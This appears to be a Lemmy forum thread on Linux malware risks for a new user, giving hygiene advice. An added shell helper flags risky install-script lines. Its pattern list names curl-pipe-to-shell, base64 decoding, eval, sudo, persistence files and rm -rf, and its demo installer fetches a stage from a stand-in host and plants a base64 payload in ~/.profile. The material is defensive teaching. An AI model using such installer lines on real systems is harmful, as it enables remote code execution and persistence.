I’m still in the research phase of switching to Linux and don’t know if this concern is reasonable. I’m not tech savvy. I’m comfortable in the Windows ecosystem and could use the DOS prompt fine when they used it. I played with QBasic and C++ when I was younger and have built a few computers but that was a couple decades+ ago.

My concern is dealing with malware. I know that Linux has fewer issues with malware than Windows but, as I understand it, that’s primarily because it has a comparatively small market share. I feel like I’m getting into Linux just as it’s getting more popular and that it will get worse if the EU moves away from Microsoft because they will most likely adopt some form of Linux as their new standard. More less-tech-savvy people like me moving to Linux makes it a juicier target for people who create and use malicious software. It’s not a reason to stay with Windows but is it a reasonable concern? Are there sufficient tools for people who don’t really know what they’re doing to be reasonably secure on Linux and will they keep up if the threat profile expands as Linux picks up more users?

  • pheusie@programming.dev · 1 point · 1 day ago

    OP, I’ll keep it short as you might have already moved on. Security on desktop Linux isn’t great. The lack of widespread sandboxing is one of the main culprits. Good ‘hygiene’ should keep you safe. But, if you’re (rightfully) more concerned, then I’d suggest looking into secureblue[1].

    1. Note: this distro might be hard to get into if it’s your first distro. Consider joining community channels for assistance.

      • pheusie@programming.dev · 1 point · edited · 15 hours ago

        Aight. I’ll give you some more then 😜:

        • Don’t expect real-time protection (à la Windows Defender) on Linux. While decent options do exist[1], the better ones come at a premium.
        • Though, related to the previous point, that’s not necessarily a bad thing. The epitome of secure OSes, GrapheneOS (for mobile) and Qubes OS (for desktop), don’t come pre-installed with one either. And I wouldn’t be surprised if their respective maintainers would justify it by stating that proactive security is simply better than reactive security.
        • FWIW, Lynis is a battle-tested security tool used to audit the system. It doesn’t work on Windows, but does on macOS, Linux and some other systems. It even goes as far as granting a numerical rating that represents how well the system performs on security and notes (point-by-point) what could be improved (and sometimes even how). While I would definitely not argue that it’s the be-all and end-all, the numerical rating definitely makes it easy to compare distros at a glance.

        There’s perhaps more to go through, but I believe we should address the elephant in the room:

        How much hardening did you even apply on your current/previous OS?

        Like, if you’ve built a literal fortress, chances are that you’ll have a hard time finding a suitable distro that provides similar protection OOTB. But, if you’re just your average Joe and you just ran with how it came OOTB and at least didn’t try to actively sabotage/compromise your system, then… chances are that a decent amount of mainstream distros will suit you fine. I kinda hinted at it in my previous comment, but a mainstream distro could be fine if you uphold best practices. So, in that scenario, the query shifts to:

        Are you willing to adopt best practices?

        If you’re unsure whether you’ll manage given your wants/needs out of the system, then that would (again) shift the question. This time we’d have to discuss the activities you engage in and ‘decide’ whether there are any distros out there that can handle those gracefully and responsibly.

        Etc. Etc.


        Warning: as you should be aware by now, and if you haven’t yet, see the security entry on the (excellent) ArchWiki and the (infamous[2]) Linux entry on Madaidan’s Insecurities, this can be a pretty ugly rabbit hole. I hope this doesn’t discourage you, though.

        Finally, consider giving answers to the bold and cursive questions 😉.

        1. Ironically, Microsoft Defender for Endpoint on Linux is one of the best out there.

        2. Madaidan used to be a security researcher on Whonix. Whonix is one of Linux’ finest when it comes to privacy and security. Heck, it’s involved in the preferred way to engage on the Tor network. It’s even endorsed by Edward Snowden. So, by their efforts/contributions, Madaidan should have rightfully earned the required credentials and be regarded as somewhat of an authority on the subject matter. However, this article wasn’t well-received. From what I saw, the community was mostly dismissive. Disappointingly so. Which…, unfortunately shows that there’s a lot more circle jerking than what we’d all admit to. Anyhow…, FWIW, there was actually a slice of the community that did take it seriously. I’d characterize them as the security-conscious. Furthermore, note that Madaidan hasn’t updated it for a couple of years now. So some of the writings have clearly become outdated. So, to be clear, the situation isn’t as bleak as they described in their article.

        • can_you_change_your_username@fedia.io (OP) · 1 point · 1 hour ago

          I’m closer to the average user than someone who has built a fortress. I use Firefox with uBlock, Ghostery, and Privacy Badger. I use the free tier of Proton VPN. I run Avast daily and Malwarebytes weekly.

          I think that I should already be close to best practices but I’m not sure how changing OS will affect that. I’m not really worried about being targeted for anything. I don’t think that I really do much risky beyond the occasional torrent or downloading a patch for a game. I get games primarily from GOG, don’t open strange emails or click strange links, and use a password manager to generate secure passwords. One of the things that I’m most unsure about is keeping everything updated. Microsoft manages keeping everything updated for the most part on Windows and the last time I needed to find a driver anywhere except from Microsoft it came on a 3.5" floppy.

          I use my computer primarily for single player gaming, Discord, and fediverse sites. I need a spreadsheet and word processor; I use OpenOffice for that right now. I do financial and work related things on a different device.

  • mlg@lemmy.world · 11 points · 3 days ago

    There’s a lot of misinformation in this thread. Linux malware targeted at desktop users has actually become more apparent in recent years due to the growing number of users.

    That didn’t use to be the case because Linux was almost exclusively used for everything except end user desktops.

    What you need to understand is that Linux is fundamentally more secure from the OS perspective. A good example is how there are no network listening services running, unlike Windows, which has SMB/NetBIOS, which had the infamous EternalBlue vulnerabilities.

    That means it is highly unlikely you will be targeted by system/service level malware that exploits known vulnerabilities, so long as you stay reasonably up to date with your package manager. Add on to the fact you probably won’t be running such software like Apache or NGINX anyways.

    but is it a reasonable concern?

    Yes, you should still stay vigilant as a user, as current malware, even for Windows, typically involves some level of social engineering.

    The bonus for Linux is that you should optimally never have to download executables from the browser. Anytime you do, make sure to pay close attention to what you are downloading and where from.

    Some key stuff for Linux:

    1. Never do a curl | bash. Always download the script and peruse it to see what it actually does.

    2. Always prefer packages from the package manager, and be careful if using 3rd party repos such as AUR or COPR.

    3. Don’t download binaries from untrusted sources, and never run as sudo without knowing what it does.

    Are there sufficient tools for people who don’t really know what they’re doing to be reasonably secure on Linux and will they keep up if the threat profile expands as Linux picks up more users?

    Yes, I suggest you become a little bit familiar with a distro that has SELinux (ex: Fedora). It’s just a MAC security control scheme, but it adds a lot of benefit if you aren’t familiar with Linux in general.

    Aside from that, you can use ClamAV for virus scanning. AV and consumer EDR on Linux isn’t that widely available due to the low amount of malware at this time, but I do expect that to slowly change as the userbase grows.

    As malware detection gets better, I’m sure ClamAV will add features and functionality to keep up.
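    One way to practise rule 1 above (download the script and read it instead of piping it into bash), as an added example that is not from any commenter in this thread: a small POSIX sh helper that checks a downloaded installer against the SHA-256 a project publishes and then lists the lines a human should read first. The sample installer it reviews is constructed here; sha256sum, mktemp and grep -E are assumed to be available (coreutils and GNU grep on a normal distro).

```shell
#!/bin/sh
# Added example, not from the thread. Two helpers for the "download it, then
# read it" workflow: verify_sha256 compares a downloaded file against the
# checksum a project publishes, and review_install_script points at the lines
# a person should read first. The pattern list is a reading aid, not a malware
# detector: a clean report does not mean the script is safe.
# Assumes POSIX sh with coreutils (sha256sum, mktemp) and grep -E.

# verify_sha256 FILE EXPECTED_HEX -> exit 0 on match, 1 on mismatch.
verify_sha256() {
    actual=$(sha256sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ]
}

# One "reason#extended-regex" entry per line. '#' is the separator because
# none of the expressions need it.
RISKY_PATTERNS='
downloads and executes another script#(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)
decodes an obfuscated payload#base64[[:space:]]+(-d|--decode)
evaluates a dynamically built command#(^|[[:space:];&|])eval[[:space:]]
escalates privileges#(^|[[:space:];&|])sudo[[:space:]]
touches a per-user persistence location#\.profile|\.bashrc|\.zshrc|\.config/autostart|\.config/systemd/user|crontab
recursive forced delete#rm[[:space:]]+-[a-zA-Z]*([rR][fF]|[fF][rR])
'

# review_install_script FILE -> prints "line N: reason" for every hit and
# returns the number of hits (0 means nothing was flagged, not "safe").
review_install_script() {
    file=$1
    hits=0
    while IFS='#' read -r reason regex; do
        [ -n "$regex" ] || continue
        matches=$(grep -nE "$regex" "$file" || true)
        [ -n "$matches" ] || continue
        printf '%s\n' "$matches" | while IFS= read -r m; do
            printf '  line %s: %s\n' "${m%%:*}" "$reason"
        done
        hits=$((hits + $(printf '%s\n' "$matches" | wc -l)))
    done <<EOF
$RISKY_PATTERNS
EOF
    return "$hits"
}

# Constructed sample of the kind of one-line installer the thread warns
# about: a second-stage download run as root, plus a base64 blob appended to
# ~/.profile so it runs at every login. example.invalid never resolves.
demo() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
#!/bin/sh
set -e
echo "Installing example-tool..."
curl -fsSL https://example.invalid/stage2.sh | sudo bash
echo 'sh -c "$(echo ZWNobyBoaQ== | base64 -d)"' >> "$HOME/.profile"
install -m 755 example-tool "$HOME/.local/bin/example-tool"
echo "Done."
EOF
    echo "Review of $tmp:"
    review_install_script "$tmp" && hits=0 || hits=$?
    echo "flagged lines: $hits (two findings on line 4, two on line 5)"
    rm -f "$tmp"
}

demo
```

    Run it against a real installer with `review_install_script ./install.sh` after `verify_sha256 ./install.sh <published hash>` succeeds; a non-zero return just tells you where to start reading.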

    • forestbeasts@pawb.social · 3 points · 3 days ago

      Distros that don’t have SELinux generally have AppArmor, which is similar, and has the advantage that it doesn’t have quite such a boneheaded design getting in the way all the time. :3 So I wouldn’t pick a distro just to get SELinux, personally!

      (I don’t like how SELinux sticks labels on individual files, except those labels are apparently pointless, because there’s a tool specifically to go through your whole filesystem and reset all the labels if they get screwed up. Which can happen (e.g. if you mount a home directory that doesn’t have the labels of every single file in it set to “this is a home file”, because you moved it from a Debian install where that isn’t a thing).)

      – Frost

      • mlg@lemmy.world · 2 points · 10 hours ago

        I can’t find it now, but there was some talk about AppArmor being dropped due to its limitations, but I guess that’s no longer the case?

        But yeah the selinux “just relabel all” is an annoying duct tape solution to anyone who has issues. Optimally you should only need to relabel a dir/file once or set the appropriate selinux policy flag if you do run into a problem.

        The user-friendly solution is supposed to be the troubleshooter, which actually works pretty well most of the time, but it still requires the user to know how SELinux works to use correctly.

  • ShellMonkey@piefed.socdojo.com · 42 up / 1 down · 4 days ago

    Linux already runs a huge portion of the world’s servers, which are a more lucrative target for bad actors than an individual machine, so it’s solidly battle tested.

    • zxqwas@lemmy.world · 32 points · 4 days ago

      They also have reasonably tech savvy admins.

      The attack I see as a risk for someone with “some skill” is copy pasting a command as root because someone on a forum said it would diagnose an issue they were having, and installing a bitcoin miner on their computer.

      • skankhunt42@lemmy.ca · 9 points · 4 days ago

        Running curl piped to bash with sudo has become pretty common. Just run this one line to install software or repos+keys that are later used to install software. That along with most older articles starting with turning off SELinux make me sad.

        I think the most important part is to take your time and understand what you’re doing before you do it. Tech savvy admins can also be caught if they’re in a rush or just blindly trust AI without confirming the command is safe.

        • forestbeasts@pawb.social · 5 points · edited · 4 days ago

          SELinux is also just a pain in the tail. We’re on Debian which has got AppArmor instead and while it has caused problems, it’s caused problems a heck of a lot less often than SELinux did when we tried Fedora.

          – Frost

      • tyrant@lemmy.world · 5 points · 4 days ago

        Unfortunately I could see myself doing something like that in a moment of frustration.

  • sbird@sopuli.xyz · 16 points · 4 days ago

    One of the main reasons why Linux can be more secure is that, being open-source, anybody is able to review the code and submit changes, meaning vulnerabilities and exploits are usually patched very quickly. This is one of the reasons why Linux has a larger market share when it comes to servers, since data security is pretty important for those!

  • Seefra 1@lemmy.zip · 10 points · 4 days ago

    Yes, security concerns are always reasonable, especially when you’re switching to different software.

    Generally speaking most Gnu/Linux distributions are safer than your average Windows install, mostly because on Windows you download .exe files from the developer’s website, which exposes you to a higher probability of a man-in-the-middle attack between your computer and the website, or simply of you clicking a fake clone of the website on the search engine.

    Installing software on Windows is scary. I tend to double-check the link on the search engine, and then on Wikipedia, and check the Wikipedia change history too to make sure the link on Wikipedia wasn’t edited.

    Even if the link is legit it’s possible that the developer simply forgot to pay for the domain, someone snatched it and is now serving a malicious version. Or simply the server may be compromised.

    On Gnu/Linux, on the other hand, software is usually installed via the repositories, which are signed by the maintainer’s PGP key. That means that even if your server is compromised, the package manager won’t install the software if the signatures don’t match. If they do match, it’s still possible but very unlikely that the software was compromised somewhere in the supply chain, from the original developer to the maintainer, but as soon as it’s detected the software is quickly removed and it’s usually in your distro’s security notices.

    Gnu/Linux is also generally more secure because when you update the system (and you should do it frequently), it also updates all installed applications (assuming you installed them via the repo). So while on Windows you still have that same old version of a PDF reader or a video player since you first installed it, which may have a known exploit (yes, I know Chocolatey exists, but I’m talking about a standard install), on Gnu/Linux the applications are usually up-to-date.

    Of course a system is only as secure as its weakest link: if one application is insecure, that may compromise the whole system. That’s where you should read hardening guides. You can sandbox applications with bubblewrap or firejail, you can install linux-hardened if you have an Arch-based distro, among other things that I never got my head around, like SELinux or AppArmor.

  • Agility0971@lemmy.world · 17 points · 4 days ago

    Your concerns are valid.

    In my opinion the easiest solution, if you don’t know what you’re doing (or don’t wanna care) would be to use exclusively an immutable distro. That would lock you out of tweaking the system, but also heavily limit any potential malware. This should be sufficient imo:

    • keep system up to date
    • don’t run programs or commands from unofficial channels
    • have firewall enabled and running
    • make offline backups of user files
    • use immutable distro

    • pheusie@programming.dev · 1 point · 1 day ago

      The way you present “immutable distros” makes them look like state-of-the-art stateless systems (a la NixOS with the impermanence module).

      As much as I’d wish (so-called) immutable distros were like that, almost none of them actually are[1].

      Fedora Atomic, which may or may not have surpassed NixOS in popularity by now, practically just locks down /usr. That’s cute, but it means that the immutability doesn’t prevent persistence of hardware in most of the filesystem.

      Similarly, I could go over the other popular immutables to point out how their immutability doesn’t do much to combat persistence. But I digress…

      1. It’s basically the aforementioned NixOS. And, even then, only if you’ve set it up like that. Guix System might offer it as well, but I couldn’t verify it the last time I looked into it.

    • scarabic@lemmy.world · 7 points · 4 days ago

      This needs to be higher. It’s the first comment I came to that:

      1. recognized that security issues are always a concern and don’t just disappear with Linux
      2. recognized that low tech savvy was part of the question and
      3. gave a very practical and on-target suggestion for how to proceed (not just Team Linux rah-rah).

      • buttmasterflex@piefed.social · 5 points · edited · 4 days ago

        Fedora Silverblue/Kinoite and Bazzite are the common ones I have heard about most as immutable options.

        I previously set up Kinoite on my wife’s laptop for her, as she doesn’t want to deal with any of the tech support stuff. By design, Kinoite is limited to installing programs as flatpaks without further tinkering/effort. It ultimately was a little too restrictive for what she wanted and had odd Bluetooth issues I was unable to sort out. I ended up putting the standard Fedora KDE spin on her laptop instead.

  • DoubleDongle@lemmy.world · 17 up / 1 down · 4 days ago

    Linux has a long history of being significantly more secure than Windows as well as being a much smaller target. Linux malware might exist these days, but it’s rare at most.

  • JTskulk@lemmy.world · 8 points · 4 days ago

    Malware is the least of your worries with Linux. The real reason malware has historically been more prevalent on Windows isn’t necessarily because of market share, it’s in the way software is distributed. In the Windows world, you go to random websites and install proprietary software; you have no idea if it’s trustworthy, even when you’ve found the official site. On Linux, you get your software from repositories (like the app store on your phone) where the software is open source and has been reviewed. All this software comes from trusted sources; you’re never accidentally going to get malware from your OS.

    • chicken@lemmy.dbzer0.com · 7 points · 4 days ago

      On Linux, you get your software from repositories

      Unfortunately I have seen many software projects where the Linux install instructions are to run a command that involves curl and a .sh file.

      • JTskulk@lemmy.world · 1 point · 1 day ago

        That does happen, and those are bad. These people are bucking the trend and bringing the Windows mentality to Linux and I hate it.

  • Toes♀@ani.social · 10 points · 4 days ago

    Most Linux malware comes from community repos and fake GitHub style projects.

    The default package repositories in all the major distributions are safe. Some examples to be worried about are pip packages and the AUR if you’re using Arch.

    My first programming language was qbasic as well. Fond memories of that.

    Vet third party sources, just like you would have on windows.

    • Cethin@lemmy.zip · 2 points · 4 days ago

      Usually they’re safe. Safe enough that the average user doesn’t need to worry about it at least. Occasionally someone will take over as the maintainer of the package and add in malware. It’s pretty rare though and not a concern to the average user.

  • netvor@lemmy.world · 7 points · 4 days ago

    Lots of people will tell you something like “don’t run stuff aS rOoT” but from a personal security POV root is almost irrelevant. A potential attacker can do plenty of damage without root.

    root only allows crossing boundaries of the current user, but for personal use, everything you care about is probably 100% accessible under your normal user account. You don’t need root to steal your photos and passwords, you don’t need root to shimmy a daemon in your ~/.profile to start every time you log in, you don’t need root to mine shitcoins, use your machine as part of botnet or whatnot.

    Good advice is to vet everything you install, or choose a third party to vet it for you. In an ideal world,

    • choose a stable, well-maintained and up-to-date distro with a good reputation,
    • limit installing software from official sources only. …and you’re probably going to be fine.

    In a less-than-ideal world, maybe add flatpak to the mix but assume that the repository is a wild west. Running AppImage apps or installing third-party .deb/.rpm/etc. packages, again, if you trust the source, you trust the source.

    (But for f’s sake, don’t just run curl | bash scripts (with sudo or not) from random github repos and stuff.)

  • cannedtuna@lemmy.world · 5 points · 4 days ago

    Linux is very secure, or can be, but that depends on your threat model and how much you’re willing to do or put up with.

    The great thing about Linux is there tends to be a lot of solid documentation that explains what features are for and how to implement them. Links above are mostly to the Arch Wiki. Whatever distro you use, you’d want to start at their wiki. I’m currently using CachyOS, and I’ve found their wiki to be very helpful.

    Some other helpful features to look into are

    • btrfs snapshot support with GRUB or Limine bootloaders: easy snapshot rollback in case of a bad update
    • atomic distros like Bazzite: updates happen on a separate subvolume and don’t apply on reboot if they aren’t 100% successful
    • immutable distros like NixOS: core directories like /usr, /bin, /sbin, /lib, /lib64, /etc, /boot, /opt are read-only for higher security against malicious software

    • boeman@lemmy.world · 3 points · 4 days ago

      Add to this a periodic CIS benchmark with OpenSCAP to diagnose any openings and certain types of vulnerabilities as you add additional software or make configuration changes. Hardening your OS is a tough task, but even with Windows or macOS, you can run into vulnerabilities that are completely there from bad configuration or rogue software.

      Now that I have that out of the way, it doesn’t matter what OS you run, there will be vulnerabilities. Being diligent in updating your machine (both the OS and installed software) will do a lot of good to keep your workstation safer.

  • GlenRambo@jlai.lu · 4 points · 4 days ago

    If you read up on why Android phones don’t need a virus scanner then basically the same applies to Linux.

    But you can always shoot yourself in the foot on any web connected device.

      • GlenRambo@jlai.lu · 1 point · 3 days ago

        I’ll take it you mean why can you shoot your foot on any web enabled device. As the other is longer to explain (hence read up or watch a video).

        So a few easy ways to fuck up your device.

        • Username admin. Password 1234.
        • or not setting up any security
        • Install this free version of <popular game> from scam.com
        • use free shitty VPN
        • don’t ever update security
        • setup folder share on network with all or more of the above issues

        Pretty much applies to phones, PC, (and OS), consoles and other devices.

  • Azzu@lemmy.dbzer0.com · 5 points · 4 days ago

    It’s simply not different than on Windows, arguably it’s much easier to stay secure. But if you managed it on Windows, the same applies on Linux: don’t run shit as administrator (root) and be suspicious if it wants to, backup your stuff, don’t install dodgy software.

  • scytale@piefed.zip · 2 points · 4 days ago

    It is reasonable to be concerned, and you absolutely should be. Just because it’s a smaller target (at the moment), it doesn’t mean you’re completely safe. Having said that, if you apply general common sense to your habits, you will mostly be ok. You don’t have to be tech savvy to know that you shouldn’t be blindly installing software or running scripts you downloaded from the internet. You also don’t need to be tech savvy to be a safe internet user and have good security hygiene (i.e. avoid dubious websites, verify that sites are legit, only download from official sources, use an adblocker, be responsible with passwords, etc.).

    Basic security measures like installing UFW on your computer and blocking incoming connections already help a ton. Then you can install ClamAV if you still deal with Windows files and extensions.

  • k4ro@lemmy.zip · 2 points · 4 days ago

    I think it’s reasonable to be concerned about Linux security. I do acknowledge that Windows just had more time to be tried and tested with malware and user error to have more safeguards, but I’m hopeful that Linux will get more secure while enduring fewer struggles than Windows as it gets popular.

    My general recommendation if you do decide to go with Linux is to keep your OS up to date, verify the apps you use (do you trust the devs, the distribution method, etc.) and use common sense (not every command you copy from the internet needs sudo, etc.).

    If you’re really curious on how you can make Linux more secure, check out the security-oriented distributions section at privacyguides.org.

    I’ve recently started using secureblue myself and it’s been a bit of an eye-opener on how secure you can make Linux and how much is still needed to be done.